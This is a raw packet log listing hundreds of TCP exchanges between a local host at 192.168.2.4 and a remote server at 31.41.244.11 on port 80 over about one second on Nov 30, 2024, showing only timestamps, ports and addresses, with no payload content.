Nov 30, 2024 04:06:09.904973030 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.024194002 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.024255991 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.024297953 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.024346113 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.028301954 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.028350115 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.028413057 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.028455019 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.095963955 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.096023083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.096060038 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.096102953 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.100182056 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.100234032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.100284100 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.100328922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.108767033 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.108813047 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.111644983 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.111690044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.111741066 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.111783981 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.120157003 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.120202065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.120279074 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.120364904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.128474951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.128525019 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.128581047 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.128627062 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.136960030 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.137012959 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.137217045 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.137259007 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.145284891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.145332098 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.145385027 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.145431042 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.153711081 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.153759956 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.153824091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.153868914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.162117958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.162182093 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.162219048 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.162265062 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.169754982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.169814110 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.169867992 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.169915915 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.177406073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.177459002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.177515984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.177561045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.185039997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.185090065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.288131952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.288186073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.288187027 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.288223028 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.290402889 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.290446997 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.290512085 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.290558100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.294929981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.294971943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.295001984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.295046091 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.299463987 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.299513102 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.299580097 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.299623966 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.304716110 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.304764032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.304836988 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.304878950 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.308564901 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.308608055 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.308670998 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.308716059 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.313095093 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.313158035 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.313205957 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.313246012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.317600012 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.317646027 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.317734003 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.317775011 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.322177887 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.322227001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.322276115 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.322320938 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.326689959 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.326740026 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.326828003 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.326868057 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.331197977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.331247091 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.331285000 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.331335068 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.335741997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.335783958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.335853100 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.335894108 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.340293884 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.340339899 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.340399981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.340444088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.344824076 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.344870090 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.344948053 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.344988108 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.349350929 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.349395037 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.349467993 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.349509954 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.353882074 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.353926897 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.354000092 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.354043007 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.358417034 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.358460903 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.358520031 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.358558893 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.362947941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.363004923 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.363051891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.363095999 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.367472887 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.367515087 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.367568016 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.367611885 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.372004986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.372051001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.372138023 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.372181892 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.376602888 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.376651049 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.376672029 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.376682997 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.381097078 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.381144047 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.381187916 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.381230116 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.419425011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.419514894 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.419528008 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.419570923 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.421713114 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.421768904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.421798944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.421838045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.480118990 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.480164051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.480165005 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.480195045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.481929064 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.481980085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.482053995 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.482100010 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.484637976 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.484683037 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.484755039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.484808922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.488219023 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.488261938 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.488325119 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.488364935 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.491801977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.491856098 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.491863012 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.491913080 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.495280981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.495321989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.495385885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.495424986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.498590946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.498641014 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.498712063 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.498747110 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.501969099 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.502012968 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.502069950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.502118111 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.505247116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.505291939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.505353928 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.505392075 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.508436918 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.508491039 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.508546114 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.508584976 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.511548996 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.511599064 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.511631966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.511672020 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.514678001 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.514718056 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.514791965 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.514841080 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.517806053 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.517858028 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.517920017 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.517961979 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.520920038 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.520963907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.521032095 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.521075010 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.524046898 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.524092913 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.524137020 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.524183989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.527184963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.527234077 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.527272940 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.527308941 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.530277014 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.530318975 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.530390978 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.530447960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.533401966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.533446074 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.533510923 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.533565044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.536530972 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.536588907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.536624908 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.536674023 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.539623022 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.539671898 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.539736032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.539777994 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.542748928 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.542812109 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.542865038 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.542910099 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.545883894 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.545928001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.546001911 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.546045065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.548024893 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.548074007 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.548146009 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.548188925 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.550092936 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.550137997 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.550215960 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.550256968 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.552189112 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.552236080 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.552481890 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.552526951 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.554284096 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.554332018 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.554400921 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.554442883 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.556375027 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.556420088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.556487083 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.556531906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.558459997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.558501959 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.558556080 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.558598995 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.560574055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.560616970 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.560683012 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.560726881 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.562644958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.562695980 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.562750101 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.562793970 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.564753056 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.564798117 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.564832926 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.564872980 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.566855907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.566901922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.566972971 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.567015886 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.568914890 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.568958044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.569020987 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.569067955 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.570960999 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.571003914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.572578907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.572624922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.572686911 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.572732925 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.573676109 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.573720932 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.611392021 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.611454964 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.611499071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.611546040 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.612432957 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.612478971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.612504005 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.612545013 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.614530087 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.614571095 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.614645958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.614690065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.616601944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.616619110 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.616656065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.616667986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.671912909 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.671971083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.672075033 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.672122002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.672786951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.672837973 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.673166037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.673209906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.673255920 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.673299074 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.675040960 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.675158024 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.675165892 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.675218105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.676898956 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.676955938 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.676971912 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.677016020 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.678730011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.678786039 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.678838968 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.678884983 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.680521965 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.680574894 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.680640936 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.680684090 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.682300091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.682358980 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.682435989 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.682483912 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.684019089 CET	80	49765	31.41.244.11	192.168.2.4
